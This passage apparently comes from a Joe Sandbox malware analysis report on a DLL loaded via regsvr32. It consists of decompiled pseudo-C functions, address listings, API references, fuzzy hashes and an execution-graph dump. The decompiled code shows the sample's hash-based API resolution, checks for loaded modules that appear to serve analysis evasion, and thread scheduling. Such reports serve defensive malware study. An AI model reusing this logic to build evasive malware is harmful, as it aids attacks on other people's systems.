													_push(_t305 + 0x648);
													_push(0xa);
													_push(7);
													_t271 = 2;
													E1000902D(_t271,  &_v572);
													_t272 =  *0x1001e688; // 0x2bb0590
													_t92 = _t272 + 0xa0; // 0x1
													_t188 = E100060DF( &_v572, _t272 + 0x228, 1,  *_t92);
													_t339 = _t339 + 0x18;
													_v632 = _t188;
													__eflags = _t188;
													if(_t188 != 0) {
														_push(_v624 % _t248 & 0x0000ffff);
														_push(_v628 & 0x0000ffff);
														_push(_v596 % _t248 & 0x0000ffff);
														_push(_v620 & 0x0000ffff);
														_push(_v632);
														_push( &_v572);
														_t200 =  *0x1001e688; // 0x2bb0590
														__eflags = _t200 + 0x1020;
														E10009640(_t333, 0x1000, _v636, _t200 + 0x1020);
														E100085D5( &_v636);
														E1000A911(_t333, 0, 0xbb8, 1);
														E1000861A( &_v632, 0xfffffffe);
														_t339 = _t339 + 0x44;
													}
													E1000861A( &_v616, 0xfffffffe);
													_pop(_t262);
												}
											}
										}
										goto L36;
									}
									__eflags = _t262 - 2;
									if(_t262 != 2) {
										goto L36;
									}
									E100049A5();
									asm("stosd");
									asm("stosd");
									asm("stosd");
									asm("stosd");
									_t211 =  *0x1001e684; // 0x2c2faa0
									 *((intOrPtr*)(_t211 + 0xd8))( &_v608);
									_t215 = _v602 + 0x00000002 & 0x0000ffff;
									_v628 = _t215;
									_t277 = 0x3c;
									_v632 = _t215 / _t277 + _v604 & 0x0000ffff;
									_t249 = E10008604(0x1000);
									_v624 = _t249;
									_pop(_t278);
									__eflags = _t249;
									if(_t249 != 0) {
										_t220 = E100095E1(_t278, 0x32d);
										_t280 =  *0x1001e688; // 0x2bb0590
										_push(_t280 + 0x228);
										_t282 = 0x3c;
										_v636 = _t220;
										_push(_v628 % _t282 & 0x0000ffff);
										E10009640(_t249, 0x1000, _t220, _v632 & 0x0000ffff);
										E100085D5( &_v636);
										E1000A911(_t249, 0, 0xbb8, 1);
										E1000861A( &_v624, 0xfffffffe);
									}
									goto L41;
								}
							}
						} else {
							_t24 = _t262 + 0x214; // 0x2
							_t238 =  *_t24;
							__eflags = _t238 - _t246;
							if(_t238 == _t246) {
								goto L17;
							}
							__eflags =  *((intOrPtr*)(_t262 + 4)) - 6;
							if( *((intOrPtr*)(_t262 + 4)) >= 6) {
								L36:
								_t144 = E100095E1(_t262, 0x610);
								_push(0);
								_push(_t144);
								_v616 = _t144;
								_t145 =  *0x1001e688; // 0x2bb0590
								_t329 = E100092E5(_t145 + 0x228);
								_v612 = _t329;
								__eflags = _t329;
								if(_t329 != 0) {
									_t160 = E1000B269(_t329);
									__eflags = _t160;
									if(_t160 != 0) {
										_t163 =  *0x1001e684; // 0x2c2faa0
										 *((intOrPtr*)(_t163 + 0x10c))(_t329);
									}
									E1000861A( &_v612, 0xfffffffe);
								}
								E100085D5( &_v616);
								_t150 =  *0x1001e688; // 0x2bb0590
								lstrcpynW(_t150 + 0x438,  *0x1001e740, 0x105);
								_t153 =  *0x1001e688; // 0x2bb0590
								_t154 = _t153 + 0x228;
								__eflags = _t154;
								lstrcpynW(_t154,  *0x1001e738, 0x105);
								_t331 =  *0x1001e688; // 0x2bb0590
								_t117 = _t331 + 0x228; // 0x2bb07b8
								 *((intOrPtr*)(_t331 + 0x434)) = E10008FBE(_t117, __eflags);
								E1000861A(0x1001e740, 0xfffffffe);
								E1000861A(0x1001e738, 0xfffffffe);
								L41:
								_t159 = 0;
								__eflags = 0;
								L42:
								return _t159;
							}
							__eflags = _t238 - 2;
							if(_t238 != 2) {
								goto L36;
							}
							goto L17;
						}
					}
					L8:
					_t159 = _t122 | 0xffffffff;
					goto L42;
				}
				_t250 = E100095C7(0x6e2);
				_v616 = _t250;
				_t326 = E100095C7(0x9f5);
				_v612 = _t326;
				if(_t250 != 0 && _t326 != 0) {
					if(GetModuleHandleA(_t250) != 0 || GetModuleHandleA(_t326) != 0) {
						_v620 = 1;
					}
					E100085C2( &_v616);
					_t122 = E100085C2( &_v612);
					_t351 = _v620;
					if(_v620 != 0) {
						goto L8;
					}
				}
			}


















































































                  0x10004d6d
                  0x10004d73
                  0x10004d79
                  0x10004d7e
                  0x10004d8c
                  0x10004d8f
                  0x10004dee
                  0x10004e00
                  0x10004e03
                  0x10004e0a
                  0x10004e0f
                  0x10004e14
                  0x10004e1b
                  0x10004e25
                  0x10004e2c
                  0x10004e37
                  0x10004e3c
                  0x10004e43
                  0x10004e49
                  0x10004e4b
                  0x10004e4c
                  0x10004e50
                  0x10004e5b
                  0x10004e60
                  0x10004e69
                  0x10004e6e
                  0x10004e76
                  0x10004e7d
                  0x10004e7e
                  0x10004e80
                  0x10004e9c
                  0x10004e9f
                  0x10004e9f
                  0x10004ea8
                  0x10004ead
                  0x10004eb7
                  0x10004ebd
                  0x10004ec5
                  0x10004eca
                  0x10004ed0
                  0x10004ed3
                  0x10004ed9
                  0x10004ef8
                  0x10004efe
                  0x10004eff
                  0x10004f00
                  0x10004f01
                  0x10004f02
                  0x10004f03
                  0x10004f07
                  0x10004f0d
                  0x10004f11
                  0x10004f16
                  0x10004f19
                  0x10004f1b
                  0x10004f2d
                  0x10004f2d
                  0x10004f2f
                  0x10004f3b
                  0x10004f40
                  0x10004f46
                  0x10004f4f
                  0x10004f52
                  0x10004f54
                  0x10004f5f
                  0x10004f64
                  0x10004f69
                  0x10004f6e
                  0x10004f6e
                  0x10004f71
                  0x10004f78
                  0x00000000
                  0x10004f7e
                  0x10004f7e
                  0x10004f83
                  0x10004f87
                  0x10004f89
                  0x10004f8c
                  0x10004f8e
                  0x10004f94
                  0x10004f94
                  0x10004f8e
                  0x10004f96
                  0x10004f9b
                  0x10004f9b
                  0x10004fa1
                  0x10004fa3
                  0x00000000
                  0x10004fa9
                  0x10004fa9
                  0x10004fad
                  0x10005082
                  0x10005088
                  0x1000508e
                  0x10005099
                  0x1000509a
                  0x1000509b
                  0x1000509c
                  0x100050a2
                  0x100050a7
                  0x100050ad
                  0x100050b5
                  0x100050bb
                  0x100050be
                  0x100050cd
                  0x100050d4
                  0x100050d7
                  0x100050e4
                  0x100050e8
                  0x100050f5
                  0x100050fa
                  0x100050fd
                  0x100050ff
                  0x10005110
                  0x10005112
                  0x10005116
                  0x10005117
                  0x10005119
                  0x10005124
                  0x10005129
                  0x10005136
                  0x1000513a
                  0x1000513b
                  0x1000513d
                  0x10005145
                  0x10005146
                  0x1000514b
                  0x10005154
                  0x10005163
                  0x10005168
                  0x1000516b
                  0x1000516f
                  0x10005171
                  0x10005184
                  0x1000518e
                  0x10005192
                  0x1000519a
                  0x1000519b
                  0x100051a3
                  0x100051a4
                  0x100051a9
                  0x100051b5
                  0x100051bf
                  0x100051d1
                  0x100051dd
                  0x100051e2
                  0x100051e2
                  0x100051ec
                  0x100051f2
                  0x100051f2
                  0x10005119
                  0x100050ff
                  0x00000000
                  0x10005088
                  0x10004fb3
                  0x10004fb6
                  0x00000000
                  0x00000000
                  0x10004fbc
                  0x10004fc7
                  0x10004fc8
                  0x10004fc9
                  0x10004fca
                  0x10004fd0
                  0x10004fd5
                  0x10004fe9
                  0x10004fee
                  0x10004ff2
                  0x10004ffd
                  0x10005006
                  0x10005008
                  0x1000500c
                  0x1000500d
                  0x1000500f
                  0x1000501a
                  0x10005020
                  0x10005032
                  0x10005035
                  0x10005038
                  0x10005045
                  0x1000504d
                  0x10005057
                  0x10005069
                  0x10005075
                  0x1000507a
                  0x00000000
                  0x1000500f
                  0x10004fa3
                  0x10004edb
                  0x10004edb
                  0x10004edb
                  0x10004ee1
                  0x10004ee3
                  0x00000000
                  0x00000000
                  0x10004ee5
                  0x10004ee9
                  0x100051f3
                  0x100051f8
                  0x100051fe
                  0x10005200
                  0x10005201
                  0x10005205
                  0x10005215
                  0x1000521a
                  0x1000521e
                  0x10005220
                  0x10005224
                  0x10005229
                  0x1000522b
                  0x1000522d
                  0x10005233
                  0x10005233
                  0x10005240
                  0x10005246
                  0x1000524c
                  0x10005251
                  0x1000526f
                  0x10005271
                  0x1000527d
                  0x1000527d
                  0x10005283
                  0x10005285
                  0x1000528b
                  0x1000529d
                  0x100052a3
                  0x100052af
                  0x100052b7
                  0x100052b7
                  0x100052b7
                  0x100052b9
                  0x100052bf
                  0x100052bf
                  0x10004eef
                  0x10004ef2
                  0x00000000
                  0x00000000
                  0x00000000
                  0x10004ef2
                  0x10004ed9
                  0x10004e1d
                  0x10004e1d
                  0x00000000
                  0x10004e1d
                  0x10004d9b
                  0x10004da2
                  0x10004dab
                  0x10004dad
                  0x10004db3
                  0x10004dc4
                  0x10004dcd
                  0x10004dcd
                  0x10004dd9
                  0x10004de2
                  0x10004de7
                  0x10004dec
                  0x00000000
                  0x00000000
                  0x10004dec

                  APIs
                  • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 10004DC0
                  • GetModuleHandleA.KERNEL32(00000000), ref: 10004DC7
                  • lstrcpynW.KERNEL32(02BB0158,00000105), ref: 1000526F
                  • lstrcpynW.KERNEL32(02BB0368,00000105), ref: 10005283
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: HandleModulelstrcpyn
                  • String ID:
                  • API String ID: 3430401031-0
                  • Opcode ID: d3734a70cf2f26b07b6158fdd21bfb9247da90fd0041dfad8ad4158361da4cd7
                  • Instruction ID: cc48400d40a66e7674bcd18edc35038107661711004b249490cc292a5082b98a
                  • Opcode Fuzzy Hash: d3734a70cf2f26b07b6158fdd21bfb9247da90fd0041dfad8ad4158361da4cd7
                  • Instruction Fuzzy Hash: A7E1CC71608341AFF340CF64CC86F6A73E9EB88390F454A29F584DB2D5EB75EA448B52
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 10001C68, Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                  Download Yara Rule
                  C-Code - Quality: 75%
                  			E10001C68(signed int __ecx, void* __eflags, void* __fp0) {
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				void* _t13;
				intOrPtr _t15;
				signed int _t16;
				intOrPtr _t17;
				signed int _t18;
				char _t20;
				intOrPtr _t22;
				void* _t23;
				void* _t24;
				intOrPtr _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t48;
				void* _t51;
				signed int _t61;
				signed int _t64;
				void* _t71;

				_t71 = __fp0;
				_t61 = __ecx;
				_t41 =  *0x1001e6dc; // 0x0
				_t13 = E1000A4BF(_t41, 0);
				while(_t13 < 0) {
					E1000980C( &_v28);
					_t43 =  *0x1001e6e0; // 0x0
					_t15 =  *0x1001e6e4; // 0x0
					_t41 = _t43 + 0xe10;
					asm("adc eax, ebx");
					__eflags = _t15 - _v24;
					if(__eflags > 0) {
						L9:
						_t16 = 0xfffffffe;
						L13:
						return _t16;
					}
					if(__eflags < 0) {
						L4:
						_t17 =  *0x1001e684; // 0x2c2faa0
						_t18 =  *((intOrPtr*)(_t17 + 0xc8))( *0x1001e6d0, 0);
						__eflags = _t18;
						if(_t18 == 0) {
							break;
						}
						_t35 =  *0x1001e684; // 0x2c2faa0
						 *((intOrPtr*)(_t35 + 0xb4))(0x3e8);
						_t41 =  *0x1001e6dc; // 0x0
						__eflags = 0;
						_t13 = E1000A4BF(_t41, 0);
						continue;
					}
					__eflags = _t41 - _v28;
					if(_t41 >= _v28) {
						goto L9;
					}
					goto L4;
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t20 =  *0x1001e6e8; // 0x0
				_v28 = _t20;
				_t22 = E1000A6A9(_t41, _t61,  &_v16);
				_v20 = _t22;
				if(_t22 != 0) {
					_t23 = GetCurrentProcess();
					_t24 = GetCurrentThread();
					DuplicateHandle(GetCurrentProcess(), _t24, _t23, 0x1001e6d0, 0, 0, 2);
					E1000980C(0x1001e6e0);
					_t64 = E10001A1B( &_v28, E10001226, _t71);
					__eflags = _t64;
					if(_t64 >= 0) {
						_push(0);
						_push( *0x1001e760);
						_t51 = 0x27;
						E10009F06(_t51);
					}
				} else {
					_t64 = _t61 | 0xffffffff;
				}
				_t29 =  *0x1001e684; // 0x2c2faa0
				 *((intOrPtr*)(_t29 + 0x30))( *0x1001e6d0);
				_t48 =  *0x1001e6dc; // 0x0
				 *0x1001e6d0 = 0;
				E1000A4DB(_t48);
				E1000861A( &_v24, 0);
				_t16 = _t64;
				goto L13;
			}

























                  0x10001c68
                  0x10001c75
                  0x10001c77
                  0x10001c7e
                  0x10001ce4
                  0x10001c8b
                  0x10001c90
                  0x10001c96
                  0x10001c9b
                  0x10001ca1
                  0x10001ca3
                  0x10001ca7
                  0x10001d15
                  0x10001d17
                  0x10001d99
                  0x10001d9f
                  0x10001d9f
                  0x10001ca9
                  0x10001cb1
                  0x10001cb1
                  0x10001cbd
                  0x10001cc3
                  0x10001cc5
                  0x00000000
                  0x00000000
                  0x10001cc7
                  0x10001cd1
                  0x10001cd7
                  0x10001cdd
                  0x10001cdf
                  0x00000000
                  0x10001cdf
                  0x10001cab
                  0x10001caf
                  0x00000000
                  0x00000000
                  0x00000000
                  0x10001caf
                  0x10001cee
                  0x10001cef
                  0x10001cf0
                  0x10001cf1
                  0x10001cf2
                  0x10001cf7
                  0x10001d01
                  0x10001d06
                  0x10001d0e
                  0x10001d29
                  0x10001d2c
                  0x10001d36
                  0x10001d41
                  0x10001d54
                  0x10001d56
                  0x10001d58
                  0x10001d5a
                  0x10001d5b
                  0x10001d63
                  0x10001d64
                  0x10001d6a
                  0x10001d10
                  0x10001d10
                  0x10001d10
                  0x10001d6b
                  0x10001d76
                  0x10001d79
                  0x10001d7f
                  0x10001d85
                  0x10001d90
                  0x10001d97
                  0x00000000

                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 51b5adafcade1612d18be566dc9ac30724e52013d4e81271525bc6ddc3b1320c
                  • Instruction ID: 912c1b93fe30e14ebce55579952f4eddc1cb52f7c5d97e94b218bb2c615be3ff
                  • Opcode Fuzzy Hash: 51b5adafcade1612d18be566dc9ac30724e52013d4e81271525bc6ddc3b1320c
                  • Instruction Fuzzy Hash: C831C036604264AFF344DFA4DCC5C6E77A9FB983D0B904A2AF941C32A5DA30ED048B52
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 10001B2D, Relevance: 6.1, APIs: 4, Instructions: 97threadCOMMON
                  Download Yara Rule
                  C-Code - Quality: 73%
                  			E10001B2D(void* __eflags, void* __fp0) {
				char _v24;
				char _v28;
				void* _t12;
				intOrPtr _t14;
				void* _t15;
				intOrPtr _t16;
				void* _t17;
				void* _t19;
				void* _t20;
				char _t24;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr _t33;
				intOrPtr _t38;
				intOrPtr _t40;
				void* _t41;
				intOrPtr _t46;
				void* _t48;
				intOrPtr _t51;
				void* _t61;
				void* _t71;

				_t71 = __fp0;
				_t38 =  *0x1001e6f4; // 0x0
				_t12 = E1000A4BF(_t38, 0);
				while(_t12 < 0) {
					E1000980C( &_v28);
					_t40 =  *0x1001e700; // 0x0
					_t14 =  *0x1001e704; // 0x0
					_t41 = _t40 + 0x3840;
					asm("adc eax, ebx");
					__eflags = _t14 - _v24;
					if(__eflags > 0) {
						L13:
						_t15 = 0;
					} else {
						if(__eflags < 0) {
							L4:
							_t16 =  *0x1001e684; // 0x2c2faa0
							_t17 =  *((intOrPtr*)(_t16 + 0xc8))( *0x1001e6ec, 0);
							__eflags = _t17;
							if(_t17 == 0) {
								break;
							} else {
								_t33 =  *0x1001e684; // 0x2c2faa0
								 *((intOrPtr*)(_t33 + 0xb4))(0x1388);
								_t51 =  *0x1001e6f4; // 0x0
								__eflags = 0;
								_t12 = E1000A4BF(_t51, 0);
								continue;
							}
						} else {
							__eflags = _t41 - _v28;
							if(_t41 >= _v28) {
								goto L13;
							} else {
								goto L4;
							}
						}
					}
					L12:
					return _t15;
				}
				E1000980C(0x1001e700);
				_t19 = GetCurrentProcess();
				_t20 = GetCurrentThread();
				DuplicateHandle(GetCurrentProcess(), _t20, _t19, 0x1001e6ec, 0, 0, 2);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t24 =  *0x1001e6e8; // 0x0
				_v28 = _t24;
				_t61 = E10001A1B( &_v28, E1000131E, _t71);
				if(_t61 >= 0) {
					_push(0);
					_push( *0x1001e760);
					_t48 = 0x27;
					E10009F06(_t48);
				}
				if(_v24 != 0) {
					E10006890( &_v24);
				}
				_t26 =  *0x1001e684; // 0x2c2faa0
				 *((intOrPtr*)(_t26 + 0x30))( *0x1001e6ec);
				_t28 =  *0x1001e758; // 0x0
				 *0x1001e6ec = 0;
				_t29 =  !=  ? 1 : _t28;
				_t46 =  *0x1001e6f4; // 0x0
				 *0x1001e758 =  !=  ? 1 : _t28;
				E1000A4DB(_t46);
				_t15 = _t61;
				goto L12;
			}
























                  0x10001b2d
                  0x10001b33
                  0x10001b41
                  0x10001baf
                  0x10001b4e
                  0x10001b53
                  0x10001b59
                  0x10001b5e
                  0x10001b64
                  0x10001b66
                  0x10001b6a
                  0x10001c64
                  0x10001c64
                  0x10001b70
                  0x10001b70
                  0x10001b7c
                  0x10001b7c
                  0x10001b88
                  0x10001b8e
                  0x10001b90
                  0x00000000
                  0x10001b92
                  0x10001b92
                  0x10001b9c
                  0x10001ba2
                  0x10001ba8
                  0x10001baa
                  0x00000000
                  0x10001baa
                  0x10001b72
                  0x10001b72
                  0x10001b76
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x10001b76
                  0x10001b70
                  0x10001c5d
                  0x10001c63
                  0x10001c63
                  0x10001bb8
                  0x10001bcc
                  0x10001bcf
                  0x10001bd9
                  0x10001be5
                  0x10001bef
                  0x10001bf0
                  0x10001bf1
                  0x10001bf2
                  0x10001bf7
                  0x10001c00
                  0x10001c04
                  0x10001c06
                  0x10001c07
                  0x10001c0f
                  0x10001c10
                  0x10001c16
                  0x10001c1b
                  0x10001c21
                  0x10001c21
                  0x10001c26
                  0x10001c31
                  0x10001c34
                  0x10001c3c
                  0x10001c48
                  0x10001c4b
                  0x10001c51
                  0x10001c56
                  0x10001c5b
                  0x00000000

                  APIs
                  • GetCurrentProcess.KERNEL32(1001E6EC,00000000,00000000,00000002), ref: 10001BCC
                  • GetCurrentThread.KERNEL32(00000000), ref: 10001BCF
                  • GetCurrentProcess.KERNEL32(00000000), ref: 10001BD6
                  • DuplicateHandle.KERNEL32 ref: 10001BD9
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: Current$Process$DuplicateHandleThread
                  • String ID:
                  • API String ID: 3566409357-0
                  • Opcode ID: 7d4547abbc7cd73308a72d50dfc35b1c5cccec9524bb0b2978a9a99cc3da80e6
                  • Instruction ID: 6a0302f5f4fd7db6b8bd225124d86af098f07b21623db759acfbad22203cc7cf
                  • Opcode Fuzzy Hash: 7d4547abbc7cd73308a72d50dfc35b1c5cccec9524bb0b2978a9a99cc3da80e6
                  • Instruction Fuzzy Hash: 50319C756083A19FF744DF64CCD886E77A9EB983D0B418968F601872A6DB30EC44CB52
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 10029B30, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 146COMMON
                  Download Yara Rule
                  APIs
                  • GetWindowsDirectoryW.KERNEL32 ref: 10029B87
                  • FindFirstChangeNotificationW.KERNEL32(10114AA8,00000000,00000020), ref: 10029BD2
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.497767833.0000000010021000.00000020.00020000.sdmp, Offset: 10021000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10021000_regsvr32.jbxd
                  Similarity
                  • API ID: ChangeDirectoryFindFirstNotificationWindows
                  • String ID: 1
                  • API String ID: 3662519435-2212294583
                  • Opcode ID: 0b9660a65e4cab3b7e7ad5c03af4bb0263a6bc0f85f4f16362e04827d69aa07f
                  • Instruction ID: a17468885719ca7b42c6c3de4681764e2a8d7b2457ed512f777c56a051c8a142
                  • Opcode Fuzzy Hash: 0b9660a65e4cab3b7e7ad5c03af4bb0263a6bc0f85f4f16362e04827d69aa07f
                  • Instruction Fuzzy Hash: 3851CF72A043A08FE335CF28CCC85D677E1EB88302F21472ED58597295D6BAAC85CB81
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 1000DFAD, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95libraryloaderCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E1000DFAD(void* __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v92;
				intOrPtr _t41;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				void* _t56;
				struct HINSTANCE__* _t58;
				_Unknown_base(*)()* _t59;
				intOrPtr _t60;
				void* _t62;
				intOrPtr _t63;
				void* _t69;
				char _t70;
				void* _t75;
				CHAR* _t80;
				void* _t82;

				_t75 = __ecx;
				_v12 = __edx;
				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
				if(_t41 == 0) {
					L4:
					return 0;
				}
				_t62 = _t41 + __ecx;
				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_t63 =  *((intOrPtr*)(_t62 + 0x18));
				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
				_t47 = 0;
				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_v8 = 0;
				_v16 = _t63;
				if(_t63 == 0) {
					goto L4;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t49 = E1000D400( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E1000C379( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
					_t51 = _v8;
					if((_t49 ^ 0x218fe95b) == _v12) {
						break;
					}
					_t73 = _v20;
					_t47 = _t51 + 1;
					_v8 = _t47;
					if(_t47 < _v16) {
						continue;
					}
					goto L4;
				}
				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
					return _t80;
				} else {
					_t56 = 0;
					while(1) {
						_t70 = _t80[_t56];
						if(_t70 == 0x2e || _t70 == 0) {
							break;
						}
						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
						_t56 = _t56 + 1;
						if(_t56 < 0x40) {
							continue;
						}
						break;
					}
					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
					 *((char*)(_t82 + _t56 - 0x54)) = 0;
					if( *((char*)(_t56 + _t80)) != 0) {
						_t80 =  &(( &(_t80[1]))[_t56]);
					}
					_t40 =  &_v92; // 0x6c6c642e
					_t58 = LoadLibraryA(_t40);
					if(_t58 == 0) {
						goto L4;
					}
					_t59 = GetProcAddress(_t58, _t80);
					if(_t59 == 0) {
						goto L4;
					}
					return _t59;
				}
			}

























                  0x1000dfb6
                  0x1000dfb8
                  0x1000dfbb
                  0x1000dfbe
                  0x1000dfc4
                  0x1000e021
                  0x00000000
                  0x1000e021
                  0x1000dfc6
                  0x1000dfd1
                  0x1000dfd4
                  0x1000dfd9
                  0x1000dfde
                  0x1000dfe1
                  0x1000dfe3
                  0x1000dfe6
                  0x1000dfe9
                  0x1000dfee
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x1000dff0
                  0x1000dff0
                  0x1000e002
                  0x1000e00f
                  0x1000e013
                  0x00000000
                  0x00000000
                  0x1000e015
                  0x1000e018
                  0x1000e019
                  0x1000e01f
                  0x00000000
                  0x00000000
                  0x00000000
                  0x1000e01f
                  0x1000e036
                  0x1000e03b
                  0x1000e03f
                  0x00000000
                  0x1000e04b
                  0x1000e04b
                  0x1000e04d
                  0x1000e04d
                  0x1000e053
                  0x00000000
                  0x00000000
                  0x1000e059
                  0x1000e05d
                  0x1000e061
                  0x00000000
                  0x00000000
                  0x00000000
                  0x1000e061
                  0x1000e067
                  0x1000e06f
                  0x1000e074
                  0x1000e077
                  0x1000e077
                  0x1000e079
                  0x1000e07d
                  0x1000e085
                  0x00000000
                  0x00000000
                  0x1000e089
                  0x1000e091
                  0x00000000
                  0x00000000
                  0x00000000
                  0x1000e091

                  APIs
                  • LoadLibraryA.KERNEL32(.dll), ref: 1000E07D
                  • GetProcAddress.KERNEL32(00000000,8DF08B59), ref: 1000E089
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: AddressLibraryLoadProc
                  • String ID: .dll
                  • API String ID: 2574300362-2738580789
                  • Opcode ID: b7447c8816937ad7f9345e32d2240df4bb2b7db976f4be3fc21d842f10db7ef4
                  • Instruction ID: 6da95daea6e89431fe10e6910c52a9851ea62cfcad36df982cd2ab94b172e300
                  • Opcode Fuzzy Hash: b7447c8816937ad7f9345e32d2240df4bb2b7db976f4be3fc21d842f10db7ef4
                  • Instruction Fuzzy Hash: F631E431A002998BEB54CFA9C8847AEBBF5EF44384F24446DD905E7349D770ED81C7A0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Analysis Process: explorer.exe PID: 2208 Parent PID: 2792 explorer.exeCOMMON

                  Execution Graph

                  Execution Coverage:14.2%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:0.6%
                  Total number of Nodes:2000
                  Total number of Limit Nodes:41

                  Graph

                  execution_graph 11806 8540e 11811 8d603 11806->11811 11809 8542c 11810 85423 GetLastError 11810->11809 11836 88604 RtlAllocateHeap 11811->11836 11813 8d61d 11814 8541f 11813->11814 11815 891e3 RtlAllocateHeap 11813->11815 11814->11809 11814->11810 11816 8d632 11815->11816 11816->11814 11837 8c3a7 11816->11837 11819 895e1 RtlAllocateHeap 11820 8d652 11819->11820 11821 89640 2 API calls 11820->11821 11822 8d667 11821->11822 11823 885d5 2 API calls 11822->11823 11824 8d670 11823->11824 11843 8d44b 11824->11843 11828 8861a 2 API calls 11829 8d720 11828->11829 11830 8861a 2 API calls 11829->11830 11831 8d72b 11830->11831 11832 8861a 2 API calls 11831->11832 11832->11814 11833 8d692 11835 8d683 11833->11835 11865 8a63b CreateFileW 11833->11865 11835->11828 11836->11813 11838 8c3c0 11837->11838 11839 88698 3 API calls 11838->11839 11841 8c4c0 11838->11841 11842 8c43b 11838->11842 11839->11842 11840 8874f memset 11840->11841 11841->11819 11842->11840 11842->11841 11844 895e1 RtlAllocateHeap 11843->11844 11845 8d45a 11844->11845 11866 8950e 11845->11866 11848 885d5 2 API calls 11849 8d46f 11848->11849 11850 8a77d 3 API calls 11849->11850 11851 8d486 11849->11851 11850->11851 11851->11835 11852 8d497 11851->11852 11853 892e5 2 API calls 11852->11853 11854 8d4b0 CoInitializeEx 11853->11854 11855 895e1 RtlAllocateHeap 11854->11855 11856 8d4cb 11855->11856 11857 895e1 RtlAllocateHeap 11856->11857 11858 8d4dc 11857->11858 11859 885d5 2 API calls 11858->11859 11860 8d4f8 11859->11860 11861 885d5 2 API calls 11860->11861 11862 8d50e 11861->11862 11863 8861a 2 API calls 11862->11863 11864 8d519 11863->11864 11864->11833 11865->11833 11867 8902d _ftol2_sse 11866->11867 11868 89531 11867->11868 11869 892e5 2 API calls 11868->11869 11870 89552 11869->11870 11870->11848 11886 83506 11887 9249b 2 API calls 11886->11887 11888 83524 